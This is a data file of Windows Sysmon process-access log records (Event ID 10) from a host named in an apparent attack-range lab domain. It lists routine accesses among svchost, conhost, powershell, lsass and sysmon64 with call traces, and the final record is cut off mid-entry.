{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F8C-5F25-0000-00105F7D0400}\r\nSourceProcessId: 4400\r\nSourceThreadId: 4420\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8C-5F25-0000-0010A6800400}\r\nTargetProcessId: 4492\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F8C-5F25-0000-00105F7D0400}","SourceProcessId":"4400","SourceThreadId":"4420","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8C-5F25-0000-0010A6800400}","TargetProcessId":"4492","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2566,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.251\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.251","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2567,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.266\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.266","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2568,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.266\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:48.266","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:48","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2569,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:48.282\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: 